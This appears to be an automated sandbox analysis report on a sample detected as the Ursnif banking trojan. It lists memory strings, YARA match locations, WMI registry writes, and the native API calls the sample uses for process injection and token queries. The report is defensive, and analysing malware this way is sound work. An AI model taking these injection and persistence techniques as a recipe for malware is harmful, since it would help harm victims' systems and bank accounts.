Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Aug 2021 18:27:51 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: loaddll32.exe, 00000000.00000003.434124521.0000000004EA8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.459171611.0000000005828000.00000004.00000040.sdmp, control.exe, 0000001E.00000002.534765366.000001B2312CC000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.434124521.0000000004EA8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.459171611.0000000005828000.00000004.00000040.sdmp, control.exe, 0000001E.00000002.534765366.000001B2312CC000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000013.00000003.431870631.00000204EF5B0000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000000.00000003.434124521.0000000004EA8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.459171611.0000000005828000.00000004.00000040.sdmp, control.exe, 0000001E.00000002.534765366.000001B2312CC000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 00000013.00000002.561220154.000002049005F000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000019.00000002.553214576.0000011326CB0000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000013.00000002.523197029.0000020480001000.00000004.00000001.sdmp, powershell.exe, 00000019.00000002.552701952.0000011326AA1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000019.00000002.553214576.0000011326CB0000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000013.00000002.561220154.000002049005F000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000013.00000002.561220154.000002049005F000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000013.00000002.561220154.000002049005F000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000019.00000002.553214576.0000011326CB0000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000013.00000002.561220154.000002049005F000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.397556594.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374227278.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434124521.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.534765366.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434060838.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397622522.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397589601.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451828519.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434180314.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.433841942.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451943735.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434086354.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.433993641.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374321927.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.381487289.0000000003D4C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.400741331.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.406917672.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397430655.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374277769.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451905542.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374345773.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374301760.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.459171611.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397475800.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451696004.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397396701.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434150338.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.543947285.000000000F1EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434024374.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.377109820.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.433927552.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374368880.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397343718.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397511011.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374359544.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374253980.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5780, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4604, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2224, type: MEMORYSTR

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.397556594.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374227278.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434124521.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.534765366.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434060838.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397622522.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397589601.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451828519.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434180314.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.433841942.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451943735.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434086354.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.433993641.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374321927.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.381487289.0000000003D4C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.400741331.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.406917672.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397430655.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374277769.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451905542.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374345773.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374301760.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.459171611.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397475800.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451696004.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397396701.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434150338.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.543947285.000000000F1EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434024374.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.377109820.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.433927552.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374368880.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397343718.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397511011.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374359544.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374253980.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5780, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4604, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2224, type: MEMORYSTR
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00D94CEA CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 4_2_00D94CEA

System Summary:

barindex
Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD812CE NtCreateSection,memset, 0_2_6DD812CE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD81E74 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_6DD81E74
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD8192C NtMapViewOfSection, 0_2_6DD8192C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD82495 NtQueryVirtualMemory, 0_2_6DD82495
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_031433A6 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 0_2_031433A6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0312CBA7 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_0312CBA7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03140A00 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 0_2_03140A00
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03136A33 NtQueryInformationProcess, 0_2_03136A33
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0313790F NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_0313790F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_031351A4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_031351A4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_031268EE NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 0_2_031268EE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03124F72 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 0_2_03124F72
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0313A680 NtMapViewOfSection, 0_2_0313A680
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03134D10 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 0_2_03134D10
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_031425B9 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 0_2_031425B9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03123C5B NtCreateSection,memset, 0_2_03123C5B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0314133A NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 0_2_0314133A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_031403BD NtQuerySystemInformation,RtlNtStatusToDosError, 0_2_031403BD
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0312C240 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 0_2_0312C240
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03128936 memset,NtQueryInformationProcess, 0_2_03128936
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_031309C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 0_2_031309C7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0313E543 NtGetContextThread,RtlNtStatusToDosError, 0_2_0313E543
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0313AD9A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_0313AD9A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0312349A memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 0_2_0312349A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00D91ADF GetProcAddress,NtCreateSection,memset, 4_2_00D91ADF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00D925E5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 4_2_00D925E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00D94F6E NtMapViewOfSection, 4_2_00D94F6E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00D98055 NtQueryVirtualMemory, 4_2_00D98055
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05374D10 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 4_2_05374D10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05364F72 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 4_2_05364F72
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_053751A4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 4_2_053751A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_053668EE NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 4_2_053668EE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_053833A6 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 4_2_053833A6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05376A33 NtQueryInformationProcess, 4_2_05376A33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05380A00 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 4_2_05380A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0537E543 NtGetContextThread,RtlNtStatusToDosError, 4_2_0537E543
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0537AD9A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 4_2_0537AD9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0536349A memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 4_2_0536349A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05368936 memset,NtQueryInformationProcess, 4_2_05368936
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0537790F NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 4_2_0537790F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_053709C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 4_2_053709C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0538133A NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 4_2_0538133A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_053803BD NtQuerySystemInformation,RtlNtStatusToDosError, 4_2_053803BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0536CBA7 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 4_2_0536CBA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0536C240 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 4_2_0536C240
Source: C:\Windows\System32\control.exe Code function: 30_2_002679DC NtQueryInformationToken,NtQueryInformationToken,NtClose, 30_2_002679DC
Source: C:\Windows\System32\control.exe Code function: 30_2_0024C29C NtQueryInformationProcess, 30_2_0024C29C
Source: C:\Windows\System32\control.exe Code function: 30_2_002566D4 NtSetInformationProcess,CreateRemoteThread, 30_2_002566D4
Source: C:\Windows\System32\control.exe Code function: 30_2_0027F004 NtProtectVirtualMemory,NtProtectVirtualMemory, 30_2_0027F004
Contains functionality to launch a process as a different user
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03125195 CreateProcessAsUserW, 0_2_03125195
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD82274 0_2_6DD82274
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0312B2A4 0_2_0312B2A4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0312EAFA 0_2_0312EAFA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_031298A0 0_2_031298A0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0312D8E5 0_2_0312D8E5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03122F9C 0_2_03122F9C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03130F82 0_2_03130F82
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0313DE9A 0_2_0313DE9A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0313ED58 0_2_0313ED58
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0313F4BE 0_2_0313F4BE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03141CD6 0_2_03141CD6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00D96680 4_2_00D96680
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00D97E30 4_2_00D97E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00D9175B 4_2_00D9175B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0537ED58 4_2_0537ED58
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0537F4BE 4_2_0537F4BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05381CD6 4_2_05381CD6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05362F9C 4_2_05362F9C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05370F82 4_2_05370F82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0537DE9A 4_2_0537DE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_053698A0 4_2_053698A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0536D8E5 4_2_0536D8E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0536B2A4 4_2_0536B2A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_053852A0 4_2_053852A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0536EAFA 4_2_0536EAFA
Source: C:\Windows\System32\control.exe Code function: 30_2_0025D958 30_2_0025D958
Source: C:\Windows\System32\control.exe Code function: 30_2_0026832C 30_2_0026832C
Source: C:\Windows\System32\control.exe Code function: 30_2_00245814 30_2_00245814
Source: C:\Windows\System32\control.exe Code function: 30_2_00263858 30_2_00263858
Source: C:\Windows\System32\control.exe Code function: 30_2_00245080 30_2_00245080
Source: C:\Windows\System32\control.exe Code function: 30_2_002490FC 30_2_002490FC
Source: C:\Windows\System32\control.exe Code function: 30_2_002430FC 30_2_002430FC
Source: C:\Windows\System32\control.exe Code function: 30_2_0024A8C4 30_2_0024A8C4
Source: C:\Windows\System32\control.exe Code function: 30_2_002558DC 30_2_002558DC
Source: C:\Windows\System32\control.exe Code function: 30_2_00265110 30_2_00265110
Source: C:\Windows\System32\control.exe Code function: 30_2_002569AC 30_2_002569AC
Source: C:\Windows\System32\control.exe Code function: 30_2_00266A38 30_2_00266A38
Source: C:\Windows\System32\control.exe Code function: 30_2_00255210 30_2_00255210
Source: C:\Windows\System32\control.exe Code function: 30_2_00266268 30_2_00266268
Source: C:\Windows\System32\control.exe Code function: 30_2_0024624C 30_2_0024624C
Source: C:\Windows\System32\control.exe Code function: 30_2_00248254 30_2_00248254
Source: C:\Windows\System32\control.exe Code function: 30_2_0025625C 30_2_0025625C
Source: C:\Windows\System32\control.exe Code function: 30_2_0026A280 30_2_0026A280
Source: C:\Windows\System32\control.exe Code function: 30_2_0026CAF4 30_2_0026CAF4
Source: C:\Windows\System32\control.exe Code function: 30_2_00243B24 30_2_00243B24
Source: C:\Windows\System32\control.exe Code function: 30_2_0026BB54 30_2_0026BB54
Source: C:\Windows\System32\control.exe Code function: 30_2_0024C3B4 30_2_0024C3B4
Source: C:\Windows\System32\control.exe Code function: 30_2_00263B8E 30_2_00263B8E
Source: C:\Windows\System32\control.exe Code function: 30_2_0024BB94 30_2_0024BB94
Source: C:\Windows\System32\control.exe Code function: 30_2_00253BE0 30_2_00253BE0
Source: C:\Windows\System32\control.exe Code function: 30_2_00255C24 30_2_00255C24
Source: C:\Windows\System32\control.exe Code function: 30_2_0026A470 30_2_0026A470
Source: C:\Windows\System32\control.exe Code function: 30_2_00241C78 30_2_00241C78
Source: C:\Windows\System32\control.exe Code function: 30_2_00249CD0 30_2_00249CD0
Source: C:\Windows\System32\control.exe Code function: 30_2_00267524 30_2_00267524
Source: C:\Windows\System32\control.exe Code function: 30_2_0024ED6C 30_2_0024ED6C
Source: C:\Windows\System32\control.exe Code function: 30_2_0025CD6C 30_2_0025CD6C
Source: C:\Windows\System32\control.exe Code function: 30_2_00260D44 30_2_00260D44
Source: C:\Windows\System32\control.exe Code function: 30_2_00247D48 30_2_00247D48
Source: C:\Windows\System32\control.exe Code function: 30_2_0025F598 30_2_0025F598
Source: C:\Windows\System32\control.exe Code function: 30_2_002425E8 30_2_002425E8
Source: C:\Windows\System32\control.exe Code function: 30_2_002575F8 30_2_002575F8
Source: C:\Windows\System32\control.exe Code function: 30_2_00266E34 30_2_00266E34
